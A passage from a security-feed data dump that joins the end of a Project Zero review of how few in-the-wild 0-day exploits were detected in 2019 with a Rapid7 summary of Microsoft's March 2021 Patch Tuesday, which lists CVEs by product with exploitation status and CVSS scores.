anti-viruses and detections were built for Microsoft Windows rather than any other platform. As time has continued, the detection methods for Windows have continued to evolve. Microsoft builds tools and techniques for detecting 0-days as well as third party security companies. We don\u2019t see the same plethora of detection tools on other platforms, especially the mobile platforms, which means there\u2019s less likelihood of detecting 0-days on those platforms too. An area for big growth is detecting 0-days on platforms other than Microsoft Windows and what level of access a vendor provides for detection..\n\n** \n**\n\n## Who is doing the detecting? \n\nAnother interesting side of detection is that a single security researcher, Cl\u00e9ment Lecigne of the Google's TAG is credited with 7 of the 21 detected 0-days in 2019 across 4 platforms: Apple iOS (CVE-2019-7286, CVE-2019-7287), Google Chrome (CVE-2019-5786), Microsoft Internet Explorer (CVE-2019-0676, CVE-2019-1367, CVE-2019-1429), and Microsoft Windows (CVE-2019-0808). Put another way, we could have detected a third less of the 0-days actually used in the wild if it wasn\u2019t for Cl\u00e9ment and team. When we add in the entity with the second most, Kaspersky Lab, with 4 of the 0-days (CVE-2019-0797, CVE-2019-0859, CVE-2019-13720, CVE-2019-1458), that means that two entities are responsible for more than 50% of the 0-days detected in 2019. If two entities out of the entirety of the global security community are responsible for detecting more than half of the 0-days in a year, that\u2019s a worrying sign for how we\u2019re using our resources. . The security community has a lot of growth to do in this area to have any confidence that we are detecting the majority of 0-days exploits that are used in the wild. \n\n** \n**\n\nOut of the 20 0-days, only one (CVE-2019-0703) included discovery credit to the vendor that was targeted, and even that one was also credited to an external researcher. To me, this is surprising because I\u2019d expect that the vendor of a platform would be best positioned to detect 0-days with their access to the most telemetry data, logs, ability to build detections into the platform, \u201ctips\u201d about exploits, etc. This begs the question: are the vendor security teams that have the most access not putting resources towards detecting 0-days, or are they finding them and just not disclosing them when they are found internally? Either way, this is less than ideal. When you consider the locked down mobile platforms, this is especially worrisome since it\u2019s so difficult for external researchers to get into those platforms and detect exploitation.\n\n** \n**\n\n## \u201cClandestine\u201d 0-day reporting\n\nAnecdotally, we know that sometimes vulnerabilities are reported surreptitiously, meaning that they are reported as just another bug, rather than a vulnerability that is being actively exploited. This hurts security because users and their enterprises may take different actions, based on their own unique threat models, if they knew a vulnerability was actively exploited. Vendors and third party security professionals could also create better detections, invest in related research, prioritize variant analysis, or take other actions that could directly make it more costly for the attacker to exploit additional vulnerabilities and users if they knew that attackers were already exploiting the bug. If all would transparently disclose when a vulnerability is exploited, our detection numbers would likely go up as well, and we would have better information about the current preferences and behaviors of attackers.\n\n** \n**\n\n# 0-day Detection on Mobile Platforms\n\nAs mentioned above, an especially interesting and needed area for development is mobile platforms, iOS and Android. In 2019, there were only 3 detected 0-days for all of mobile: 2 for iOS (CVE-2019-7286 and CVE-2019-7287) and 1 for Android (CVE-2019-2215). However, there are billions of mobile phone users and Android and iOS exploits sell for double or more compared to an equivalent desktop exploit according to [Zerodium](<https://zerodium.com/program.html>). We know that these exploits are being developed and used, we\u2019re just not finding them. The mobile platforms, iOS and Android, are likely two of the toughest platforms for third party security solutions to deploy upon due to the \u201cwalled garden\u201d of iOS and the application sandboxes of both platforms. The same features that are critical for user security also make it difficult for third parties to deploy on-device detection solutions. Since it\u2019s so difficult for non-vendors to deploy solutions, we as users and the security community, rely on the vendors to be active and transparent in hunting 0-days targeting these platforms. Therefore a crucial question becomes, how do we as fellow security professionals incentivize the vendors to prioritize this?\n\n** \n**\n\nAnother interesting artifact that appeared when doing the analysis is that CVE-2019-2215 is the first detected 0-day since we started tracking 0-days targeting Android. Up until that point, the closest was CVE-2016-5195, which targeted Linux. Yet, the only Android 0-day found in 2019 (AND since 2014) is CVE-2019-2215, which was detected through documents rather than by finding a zero-day exploit sample. Therefore, no 0-day exploit samples were detected (or, at least, publicly disclosed) in all of 2019, 2018, 2017, 2016, 2015, and half of 2014. Based on knowledge of the offensive security industry, we know that that doesn\u2019t mean none were used. Instead it means we aren\u2019t detecting well enough and 0-days are being exploited without public knowledge. Therefore, those 0-days go unpatched and users and the security community are unable to take additional defensive actions. Researching new methodologies for detecting 0-days targeting mobile platforms, iOS and Android, is a focus for Project Zero in 2020.\n\n** \n**\n\n# Detection on Other Platforms\n\nIt\u2019s interesting to note that other popular platforms had no 0-days detected over the same period: like Linux, Safari, or macOS. While no 0-days have been publicly detected in these operating systems, we can have confidence that they are still targets of interest, based on the amount of users they have, job requisitions for offensive positions seeking these skills, and even conversations with offensive security researchers. If Trend Micro\u2019s OfficeScan is worth targeting, then so are the other much more prevalent products. If that\u2019s the case, then again it leads us back to detection. We should also keep in mind though that some platforms may not need 0-days for successful exploitation. For example, this [blogpost](<https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html>) details how iOS exploit chains used publicly known n-days to exploit WebKit. But without more complete data, we can\u2019t make confident determinations of how much 0-day exploitation is occurring per platform.\n\n# Conclusion\n\nHere\u2019s our first Year in Review of 0-days exploited in the wild. As this program evolves, so will what we publish based on feedback from you and as our own knowledge and experience continues to grow. We started this effort with the assumption of finding a multitude of different conclusions, primarily \u201ctechnical\u201d, but once the analysis began, it became clear that everything came back to a single conclusion: we have a big gap in detecting 0-day exploits. Project Zero is committed to continuing to research new detection methodologies for 0-day exploits and sharing that knowledge with the world. \n\n** \n**\n\nAlong with publishing this Year in Review today, we\u2019re also publishing the [root cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>) that we completed, which were used to draw our conclusions. Please check out the [blog post](<https://googleprojectzero.blogspot.com/2020/07/root-cause-analyses-for-0-day-in-wild.html>) if you\u2019re interested in more details about the different 0-days exploited in the wild in 2019. \n\n \n\n", "modified": "2020-07-29T00:00:00", "published": "2020-07-29T00:00:00", "id": "GOOGLEPROJECTZERO:2E85097DC4FBE492B1CB6FAE84AFE126", "href": "https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html", "type": "googleprojectzero", "title": "\nDetection Deficit: A Year in Review of 0-days Used In-The-Wild in 2019\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-03-13T12:49:58", "bulletinFamily": "info", "cvelist": ["CVE-2020-27844", "CVE-2021-1640", "CVE-2021-1729", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190", "CVE-2021-21300", "CVE-2021-24089", "CVE-2021-24090", "CVE-2021-24095", "CVE-2021-24104", "CVE-2021-24107", "CVE-2021-24108", "CVE-2021-24110", "CVE-2021-26411", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26859", "CVE-2021-26860", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26863", "CVE-2021-26864", "CVE-2021-26865", "CVE-2021-26866", "CVE-2021-26867", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26870", "CVE-2021-26871", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26874", "CVE-2021-26875", "CVE-2021-26876", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26880", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26885", "CVE-2021-26886", "CVE-2021-26887", "CVE-2021-26889", "CVE-2021-26890", "CVE-2021-26891", "CVE-2021-26892", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26900", "CVE-2021-26901", "CVE-2021-26902", "CVE-2021-27047", "CVE-2021-27048", "CVE-2021-27049", "CVE-2021-27050", "CVE-2021-27051", "CVE-2021-27052", "CVE-2021-27053", "CVE-2021-27054", "CVE-2021-27055", "CVE-2021-27056", "CVE-2021-27057", "CVE-2021-27058", "CVE-2021-27059", "CVE-2021-27060", "CVE-2021-27061", "CVE-2021-27062", "CVE-2021-27063", "CVE-2021-27065", "CVE-2021-27066", "CVE-2021-27070", "CVE-2021-27074", "CVE-2021-27075", "CVE-2021-27076", "CVE-2021-27077", "CVE-2021-27078", "CVE-2021-27080", "CVE-2021-27081", "CVE-2021-27082", "CVE-2021-27083", "CVE-2021-27084", "CVE-2021-27085"], "description": "\n\nAnother Patch Tuesday ([2021-Mar](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar>)) is upon us and with this month comes a whopping 122 CVEs. As usual Windows tops the list of the most patched product. However, this month it\u2019s browser vulnerabilities taking the second place, outnumbering Office vulnerabilities 3:1! Lastly, the Exchange Server vulnerabilities this month are not to be ignored as more than half of them have been seen exploited in the wild.\n\n### Vulnerability Breakdown by Software Family\n\nFamily | Vulnerability Count \n---|--- \nWindows | 59 \nBrowser | 35 \nESU | 24 \nMicrosoft Office | 11 \nExchange Server | 7 \nDeveloper Tools | 6 \nAzure | 3 \nSQL Server | 1 \n \n## [Exchange Server Vulnerabilities](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>)\n\nEarlier this month Microsoft [released out of band updates for Exchange Server](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>). These critical updates fixed a number of publicly exploited vulnerabilities, but not before attackers were able to compromise over 30,000 internet facing instances. \n\nYesterday, Microsoft issued an [additional set of patches](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) for older, unsupported versions of Exchange Server. This allows customers who have not been able to update to the most recent version of Exchange the ability to defend against these widespread exploit attempts.\n\nIf you administer an Exchange Server,** stop reading this blog and go patch these systems!** For more information [please see our blog post on the topic](<https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>).\n\n## Patch those Windows systems!\n\nAlmost half of the newly announced vulnerabilities this month affect components of Windows itself. Some major highlights include:\n\n * Multiple high severity RCE vulnerabilities in Windows DNS Server \n([CVE-2021-26877](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26877>), [CVE-2021-26893](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26893>), [CVE-2021-26894](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26894>), [CVE-2021-26895](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26895>), and [CVE-2021-26897](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26897>))\n * Remote Code Execution in Hyper-V ([CVE-2021-26867](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26867>)) enabling virtual machine escape (CVSSv3 9.9)\n\n## Browser Vulnerabilities\n\nSince going end-of-life in November 2020, we haven't seen any Internet Explorer patches from Microsoft. However, this month Microsoft has made two new updates available: [CVE-2021-27085](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27085>) and [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26411>). CVE-2021-26411 has been exploited in the wild, so don't delay applying patches if IE is still in your environment.\n\nThe majority of the browser vulnerabilities announced this month affect Microsoft Edge on Chromium. These patches are courtesy of vulnerabilities being fixed upstream in the Chromium project.\n\n## Summary Tables\n\nHere are this month's patched vulnerabilities split by the product family.\n\n## Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27075](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27075>) | Azure Virtual Machine Information Disclosure Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-27080](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27080>) | Azure Sphere Unsigned Code Execution Vulnerability | No | No | 9.3 | Yes \n[CVE-2021-27074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27074>) | Azure Sphere Unsigned Code Execution Vulnerability | No | No | 6.2 | Yes \n \n## Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27085](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27085>) | Internet Explorer Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-21190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21190>) | Chromium CVE-2021-21190 : Uninitialized Use in PDFium | No | No | N/A | Yes \n[CVE-2021-21189](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21189>) | Chromium CVE-2021-21189: Insufficient policy enforcement in payments | No | No | N/A | Yes \n[CVE-2021-21188](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21188>) | Chromium CVE-2021-21188: Use after free in Blink | No | No | N/A | Yes \n[CVE-2021-21187](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21187>) | Chromium CVE-2021-21187: Insufficient data validation in URL formatting | No | No | N/A | Yes \n[CVE-2021-21186](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21186>) | Chromium CVE-2021-21186: Insufficient policy enforcement in QR scanning | No | No | N/A | Yes \n[CVE-2021-21185](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21185>) | Chromium CVE-2021-21185: Insufficient policy enforcement in extensions | No | No | N/A | Yes \n[CVE-2021-21184](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21184>) | Chromium CVE-2021-21184: Inappropriate implementation in performance APIs | No | No | N/A | Yes \n[CVE-2021-21183](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21183>) | Chromium CVE-2021-21183: Inappropriate implementation in performance APIs | No | No | N/A | Yes \n[CVE-2021-21182](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21182>) | Chromium CVE-2021-21182: Insufficient policy enforcement in navigations | No | No | N/A | Yes \n[CVE-2021-21181](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21181>) | Chromium CVE-2021-21181: Side-channel information leakage in autofill | No | No | N/A | Yes \n[CVE-2021-21180](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21180>) | Chromium CVE-2021-21180: Use after free in tab search | No | No | N/A | Yes \n[CVE-2021-21179](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21179>) | Chromium CVE-2021-21179: Use after free in Network Internals | No | No | N/A | Yes \n[CVE-2021-21178](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21178>) | Chromium CVE-2021-21178 : Inappropriate implementation in Compositing | No | No | N/A | Yes \n[CVE-2021-21177](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21177>) | Chromium CVE-2021-21177: Insufficient policy enforcement in Autofill | No | No | N/A | Yes \n[CVE-2021-21176](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21176>) | Chromium CVE-2021-21176: Inappropriate implementation in full screen mode | No | No | N/A | Yes \n[CVE-2021-21175](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21175>) | Chromium CVE-2021-21175: Inappropriate implementation in Site isolation | No | No | N/A | Yes \n[CVE-2021-21174](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21174>) | Chromium CVE-2021-21174: Inappropriate implementation in Referrer | No | No | N/A | Yes \n[CVE-2021-21173](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21173>) | Chromium CVE-2021-21173: Side-channel information leakage in Network Internals | No | No | N/A | Yes \n[CVE-2021-21172](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21172>) | Chromium CVE-2021-21172: Insufficient policy enforcement in File System API | No | No | N/A | Yes \n[CVE-2021-21171](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21171>) | Chromium CVE-2021-21171: Incorrect security UI in TabStrip and Navigation | No | No | N/A | Yes \n[CVE-2021-21170](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21170>) | Chromium CVE-2021-21170: Incorrect security UI in Loader | No | No | N/A | Yes \n[CVE-2021-21169](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21169>) | Chromium CVE-2021-21169: Out of bounds memory access in V8 | No | No | N/A | Yes \n[CVE-2021-21168](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21168>) | Chromium CVE-2021-21168: Insufficient policy enforcement in appcache | No | No | N/A | Yes \n[CVE-2021-21167](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21167>) | Chromium CVE-2021-21167: Use after free in bookmarks | No | No | N/A | Yes \n[CVE-2021-21166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21166>) | Chromium CVE-2021-21166: Object lifecycle issue in audio | No | No | N/A | Yes \n[CVE-2021-21165](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21165>) | Chromium CVE-2021-21165: Object lifecycle issue in audio | No | No | N/A | Yes \n[CVE-2021-21164](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21164>) | Chromium CVE-2021-21164: Insufficient data validation in Chrome for iOS | No | No | N/A | Yes \n[CVE-2021-21163](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21163>) | Chromium CVE-2021-21163: Insufficient data validation in Reader Mode | No | No | N/A | Yes \n[CVE-2021-21162](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21162>) | Chromium CVE-2021-21162: Use after free in WebRTC | No | No | N/A | Yes \n[CVE-2021-21161](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21161>) | Chromium CVE-2021-21161: Heap buffer overflow in TabStrip | No | No | N/A | Yes \n[CVE-2021-21160](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21160>) | Chromium CVE-2021-21160: Heap buffer overflow in WebAudio | No | No | N/A | Yes \n[CVE-2021-21159](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21159>) | Chromium CVE-2021-21159: Heap buffer overflow in TabStrip | No | No | N/A | Yes \n[CVE-2020-27844](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-27844>) | Chromium CVE-2020-27844: Heap buffer overflow in OpenJPEG | No | No | N/A | Yes \n \n## Browser ESU Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>) | Internet Explorer Memory Corruption Vulnerability | Yes | Yes | 8.8 | Yes \n \n## Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27060](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27060>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27084](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27084>) | Visual Studio Code Java Extension Pack Remote Code Execution Vulnerability | No | No | N/A | No \n[CVE-2021-27081](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27081>) | Visual Studio Code ESLint Extension Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27083](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27083>) | Remote Development Extension for Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27082](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27082>) | Quantum Development Kit for Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-21300](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21300>) | Git for Visual Studio Remote Code Execution Vulnerability | No | No | 8.8 | No \n \n## Exchange Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26412](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26412>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9.1 | No \n[CVE-2021-26855](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 9.1 | Yes \n[CVE-2021-27078](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27078>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9.1 | No \n[CVE-2021-26857](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-27065](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27065>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-26858](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-26854](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26854>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 6.6 | No \n \n## Microsoft Office Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27055](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27055>) | Microsoft Visio Security Feature Bypass Vulnerability | No | No | 7 | Yes \n[CVE-2021-24104](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24104>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 4.6 | Yes \n[CVE-2021-27076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27076>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-27052](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27052>) | Microsoft SharePoint Server Information Disclosure Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-27056](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27056>) | Microsoft PowerPoint Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24108](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24108>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27057](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27057>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27059](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27059>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.6 | Yes \n[CVE-2021-27058](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27058>) | Microsoft Office ClickToRun Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27053](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27053>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27054](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27054>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## SQL Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26859](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26859>) | Microsoft Power BI Information Disclosure Vulnerability | No | No | 7.7 | Yes \n \n## Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26900](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26900>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26863](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26863>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26871](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26871>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26885](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26885>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26864](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26864>) | Windows Virtual Registry Provider Elevation of Privilege Vulnerability | No | No | 8.4 | No \n[CVE-2021-1729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1729>) | Windows Update Stack Setup Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26889](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26889>) | Windows Update Stack Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26866](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26866>) | Windows Update Service Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26870](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26870>) | Windows Projected File System Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26874](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26874>) | Windows Overlay Filter Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26879](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26879>) | Windows NAT Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-26884](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26884>) | Windows Media Photo Codec Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26867](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26867>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 9.9 | Yes \n[CVE-2021-26868](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26868>) | Windows Graphics Component Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26892](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26892>) | Windows Extensible Firmware Interface Security Feature Bypass Vulnerability | No | No | 6.2 | No \n[CVE-2021-24090](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24090>) | Windows Error Reporting Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26865](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26865>) | Windows Container Execution Agent Elevation of Privilege Vulnerability | No | No | 8.8 | No \n[CVE-2021-26891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26891>) | Windows Container Execution Agent Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26860](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26860>) | Windows App-V Overlay Filter Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-27066](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27066>) | Windows Admin Center Security Feature Bypass Vulnerability | No | No | 4.3 | No \n[CVE-2021-27070](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27070>) | Windows 10 Update Assistant Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-26886](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26886>) | User Profile Service Denial of Service Vulnerability | No | No | 5.5 | No \n[CVE-2021-26880](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26880>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26876](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26876>) | OpenType Font Parsing Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-24089](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24089>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-26902](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26902>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27061](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27061>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes 